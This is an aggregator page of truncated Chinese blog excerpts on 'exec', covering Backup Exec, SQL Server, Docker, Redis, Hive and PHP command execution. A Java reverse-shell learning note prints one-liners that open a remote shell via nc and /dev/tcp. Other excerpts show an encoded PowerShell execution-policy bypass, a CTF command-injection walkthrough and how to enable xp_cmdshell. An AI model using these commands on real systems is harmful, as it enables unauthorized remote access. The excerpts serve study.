ICode9

精准搜索请尝试: 精确搜索
  • Veritas Backup Exec™ 21.4 Multilingual (Windows) 下载2021-12-11 09:35:24

    Backup Exec 21.4, Release date: 2021-12-06 请访问原文链接:https://sysin.cn/blog/veritas-backup-exec-21/,查看最新版。原创作品,转载请保留出处。 作者:gc(at)sysin.org,主页:www.sysin.cn Backup Exec:适用于云就绪企业的备份和恢复方案 让您实现无障碍备份的备份解决方案 Back

  • exec文件执行(过滤管道符,宽字节注入,@+文件名做本地文件读取)——Cat—攻防世界2021-12-09 22:32:00

       题目界面 输入127.0.0.1,发现可以正常返回    但是输入管道符或者;,尝试一波 &,| 等管道符号和ls dir等命令均报错了   细看url可以直接发现 空格直接被url编码为了+,考虑报错回显,输入url=%80,出现报错信息    复制源码,然后在本地打开    这里搜索到链接数据库的接口,利

  • sql server主从复制记录2021-12-06 14:33:00

    1. 在主上面脚本查询 exec sp_replcounters   2. 订阅的时候,报进程无法在 上执行 sp_replcmds dbo 不存在 发现从库的owner是空   3. 运维技巧 4. 跟踪令牌--测试复制延迟  

  • 《操作系统导论》笔记(4、插叙:进程API)2021-12-06 12:07:22

    4 插叙:进程API 4.1 fork()系统调用 fork()创建一个新进程。新创建的进程叫子进程,原来的进程称为父进程。子进程不会从main()函数开始执行,而是直接从fork()系统调用返回 父进程获得的返回值是新创建的子进程的PID,而子进程获得的返回值是0 4.2 wait()系统调用 有时候父进程需要

  • 微信小程序获取元素的高度2021-12-04 16:33:10

    var that = this var query = wx.createSelectorQuery(); query.select('.tab-list').boundingClientRect(); query.exec(function (res) { that.setData({ tabHeight: res[0].height }) }); res里面的值:  

  • 7. web安全之命令执行(1)2021-12-02 20:31:34

                      命令执行漏洞  目录  PHP常见命令执行函数  命令执行漏洞   一. PHP常见命令执行函数 1. system()函数 (1)函数介绍:system-执行外部程序,并显示输出 (2)主要使用方式:system(string $command) 函数代码:                  

  • Docker之Link命令解析2021-11-30 11:03:49

    1.新建两台容器,第二台(busybox_2)link到第一台(busybox_1) [root@localhost ~]# docker run -d -it --name busybox_1 busybox /bin/sh -c "while true;do sleep 3600;done" 8240c9aa04e3b5653c6747ae13a4e4478eb8e62060e4c8644492dbbf5c71c734 [root@localhost ~]# docker run

  • java连接linux2021-11-23 21:34:42

      本地调用 public static void main(String[] args){ Process proc = RunTime.getRunTime().exec("cd /home/winnie; ls;") // 标准输入流(必须写在 waitFor 之前) String inStr = consumeInputStream(proc.getInputStream()); // 标准错误流(必须写在 waitFor

  • sql server存储过程中:exec @sql 必须要写成 exec (@sql) 不要忘记括号2021-11-22 09:02:15

    --如果不加括号,则只能执行644字节的代码,如果改成EXEC (@lv_query)一切正常,为了这个bug调试了差不多一个小时, 估计是不加括号时,SQL Server会把它当成调用存储过程或函数来执行,所以只有644字节的大小,而加了括号SQL Server就知道是动态SQL。 原文链接

  • hivesql优化-FileInputFormat中切片的大小的参数2021-11-21 11:33:54

    hive.exec.parallel可以控制一个sql中多个可并行执行的job的运行方式.当hive.exec.parallel为true的时候,同一个sql中可以并行执行的job会并发的执行. 而参数hive.exec.parallel.thread.number就是控制对于同一个sql来说同时可以运行的job的最大值,该参数默认为8.此时最大可以同时

  • SqlServer正则 替换数据2021-11-19 13:34:03

    引用 https://www.cnblogs.com/keepfool/archive/2012/03/25/2416911.html   CREATE function dbo.regexReplace ( @source ntext, --原字符串 @regexp varchar(1000), --正则表达式 @replace varchar(1000), --替换值 @globalReplace bit = 1, --是否是全局替换 @ignoreCase

  • 一键部署Home Assistant ubuntu 20.4.3 树莓派3b+脚本2021-11-19 13:02:23

      树莓派3b+安装好 Ubuntu Server 20.04.3 LTS 32bit 后即可适用此脚本,其他版本树莓派/系统可能需要微调脚本*为避免一些未知/已知错误方便排查 脚本存在冗余部分,足够了解linux的可自行精简,Y/N在需要时手动键入 下面HA驱动处根据需要修改 # 树莓派3b+安装好 Ubuntu Server 20.

  • 『踩坑记录』Java-Runtime.exec()执行命令报错Cannot run program “xxx“:系统找不到指定的文件2021-11-18 15:03:08

    文章目录 问题描述解决完 问题描述 在Windows调用exec执行dir时报错:Exception in thread “main” java.io.IOException: Cannot run program “dir”: CreateProcess error=2, 系统找不到指定的文件。 String[] cmd = {"dir"}; Runtime.getRuntime().exec(cmd); 解决

  • SQLServer 开启cmd命令2021-11-18 13:31:35

    参考地址https://www.cnblogs.com/OliverQin/p/5032014.html   shell是用户与操作系统对话的一个接口,通过shell告诉操作系统让系统执行我们的指令 xp_cmdshell在sqlserver中默认是关闭的存在安全隐患。 --打开xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONF

  • Python入门学习笔记(7)2021-11-16 20:02:00

    今日学习内容为高级字符串内置函数。 1.eval()函数 ——执行一个字符串表达式并返回执行结果 语法格式: eval(expression[,globals[,locals]]) expression:字符串表达式 globals:可选参数,变量作用域,全局命名空间,如果指定参数,必须是一个字典对象。 locals:可选参数,变量作用域,局部

  • standard_init_linux.go:228: exec user process caused “no such file or directory“ - Docker2021-11-15 18:59:31

    首先声明,转载自这位大佬:docker启动报错:standard_init_linux.go:211: exec user process caused "no such file or directory"_feinifi的博客-CSDN博客 如题所示,根据自己构建的镜像启动docker容器,直接退出,查看容器日志报错信息,没有任何别的信息。网上搜索这个问题,发现很多人都遇

  • 一些手工注入2021-11-14 02:00:07

    sql注入产生的条件: 用户能够控制输入 原本程序执行的语句拼接了用户输入的数据 sql注入实质 通过把sql命令插入到web表单提交或者输入域名或页面请求的查询字符串,最终达到七篇服务器执行恶意sql命令 手工注入 判断是否有注入 ;and 1=1 ;and 1=2 初步判断是否是mssql (微软的SQL

  • [Ubuntu20.04]——PyCharm安装后无快捷图标2021-11-12 15:30:12

    这里一般就是在 /etc/share/applications 配置一个xxx.desktop文件,其中: Exec:指定程序可执行程序的路径Icon:指定程序快捷方式所用的图标,也可以自定义 [Desktop Entry] Encoding=UTF-8 Name=pycharm Comment=Pycharm IDE Exec=/mnt/sda3/pycharm/pycharm-community-2021.2.3/bin

  • powershell弹msgbox2021-11-11 10:32:50

    powershell -exec bypass -enc ZgB1AG4AYwB0AGkAbwBuACAAUgBlAGEAZAAtAE0AZQBzAHMAYQBnAGUAQgBvAHgARABpAGEAbABvAGcADQAKAHsADQAKAAkAcABhAHIAYQBtACAAKAANAAoACQAJAFsAcwB0AHIAaQBuAGcAXQAkAE0AZQBzAHMAYQBnAGUALAANAAoACQAJAFsAcwB0AHIAaQBuAGcAXQAkAFcAaQBuAGQAbwB3AFQAa

  • Redis 事务处理2021-11-10 10:00:31

    Redis 事务处理 Redis 事务处理概念 众所周知,事务是指 “一个完整的动作,要么全部执行,要么什么也没有做”。 在聊 redis 事务处理之前,要先和大家介绍四个redis指令,即MULTI、EXEC、DISCARD、WATCH。这四个指令构成了redis事务处理的基础。 MULTI:用来组装一个事务; EXEC:用来执行一个

  • Java反弹shell小记(个人学习记录)2021-11-08 13:04:28

    前言 看到谢公子公众号推的一篇JDWP打点,看到如下形式的反弹shell,以前有记过。 nc 192.168.178.129 3333 | /bin/bash | nc 192.168.178.129 4444% sh -i >& /dev/tcp/101.200.xx.xx/3333 0>&1 | /bin/sh | sh -i >& /dev/tcp/101.200.xx.xx/4444 0>&1% 但是没理解,并且再看这篇推文

  • PHP中命令执行的几种姿势总结2021-11-07 12:30:18

    命令执行是web攻击中常用的手法之一,在PHP中,可调用以下函数来实现命令执行,如 1、exec() exec函数用的较少,主要是因为该函数默认返回值是执行结果的最后一行,并不会有全部的执行结果。如果要打印执行结果,需遍历打印output数组, 1.1 函数原型 string exec ( string command, array &

  • Redis 事物2021-11-06 19:59:06

    事物是一组命令的集合,一个事务中的所有的命令都会被序列化后按顺序执行,中间不会被其它命令插入 multi/exec redisTemplate.setEnableTransactionSupport(true); // 开启事务支持 redisTemplate.multi();// 开启事务 redisTemplate.opsForValue().set(stockKey, --stock); //

  • HDP 10.Azkaban 编译及 LDAP 配置2021-11-04 18:03:07

    1、下载 ( 在 client-v01 服务器操作 ) mkdir -p /software/; cd /software/; yum -y install git; git clone https://github.com/azkaban/azkaban.git 2、编译( 在 client-v01 服务器操作 ) yum -y install npm npm install -g less dustjs-linkedin yum -y install ant* cd

  • lambdaQueryWrapper多条件嵌套查询2021-11-04 13:32:59

    queryWrapper.and(wq -> { if(!CollectionUtils.isEmpty(orgList)){ wq.or(wq0 -> wq0.in(PatrolPlan::getOrgId, orgList)); wq.or(wq1 -> wq1.eq(PatrolPlan::getPlanExecType, PlanExecTypeEnum.ORG.getCode()).in(P

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有